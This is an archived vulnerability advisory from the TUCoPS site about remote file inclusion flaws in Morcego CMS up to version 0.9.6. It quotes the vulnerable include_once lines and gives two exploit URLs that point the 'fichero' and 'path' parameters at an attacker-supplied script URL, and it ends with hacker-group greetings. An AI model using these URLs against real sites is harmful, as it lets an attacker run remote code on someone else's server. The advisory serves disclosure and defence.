TUCoPS :: Web :: CMS / Portals :: b06-5201.htm

Morcego CMS <= 0.9.6 Remote File Inclue Vulnerability
Morcego CMS <= 0.9.6 Remote File Inclue Vulnerability
Morcego CMS <= 0.9.6 Remote File Inclue Vulnerability



====================================================================
 # Morcego CMS <= 0.9.6 Remote File Inclue Vulnerability

====================================================================
 # Author : Le CoPrA

====================================================================
# Download Script : http://www.linkini.net/phpscripts/descargas/Portales%20PHP%20(13%20Archivos)/Morcego%20CMS%200.9.6.0.zip 

==================================================================== # Bugs in
  
   (1) includes/morcegoCMS/morcegoCMS.php
   (2) includes/morcegoCMS/adodb/adodb.inc.php
 
 # Vuln Code 1 :

                   include_once($fichero);

 # Vuln Code 2 : 
                  include_once($path);
		  $class = "ADODB2_$drivername";       
		  
 ====================================================================
 # Exploits :

http://www.victim.com/[path]/includes/morcegoCMS/morcegoCMS.php?fichero=|SCRIPT-URL| 

http://www.victim.com/[path]/includes/morcegoCMS/adodb/adodb.inc.php?path=|SCRIPT-URL| 

 ====================================================================
   # Discovered by : Le CoPrA

   # ConTaCT  :  Le.CoPrA |at| Hotmail |dot| CoM

   # Special Greetz FlyinG 2 || Str0ke ||

   # Greetz4// alkasrgolden, LovER BoY, Saudi Hackrz, HACKERS PAL, Black-Code, CrAsH_oVeR_rIdE, bOhAjEr, Broken-Proxy, simo64
             3theaby geer,Mohajer22,Qaher_Yhod,MR.WOLF,cRiMiNaL NeT,al3iznet,Abdullah-00 ,egyptghost,ToOoFA,KaBaRa,HakrAwY

# Channel : wWw.TrYaG.cOm/vb || WwW.kOnDoR4.Com/vb || wWw.Q8cracker.com 

==========================================================================================================================

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH